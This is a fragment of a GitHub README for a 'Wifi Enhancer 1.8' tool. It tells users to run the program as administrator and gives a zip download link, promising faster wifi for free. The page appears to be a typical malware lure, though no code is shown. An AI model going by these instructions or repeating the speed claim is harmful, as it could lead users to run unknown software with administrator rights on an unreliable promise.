yeetergamerisnotsus/Wifi-Enhancer/README.md

 4. When you have finished that open the file then run "Wifi Enhancer 1.8" as administrator.

 5. Enjoy Your upgraded and faster wifi for free

+**NOTE** If you cannot install the zip paste this into your browser https://github.com/yeetergamerisnotsus/Wifi-Enhancer/archive/refs/heads/main.zip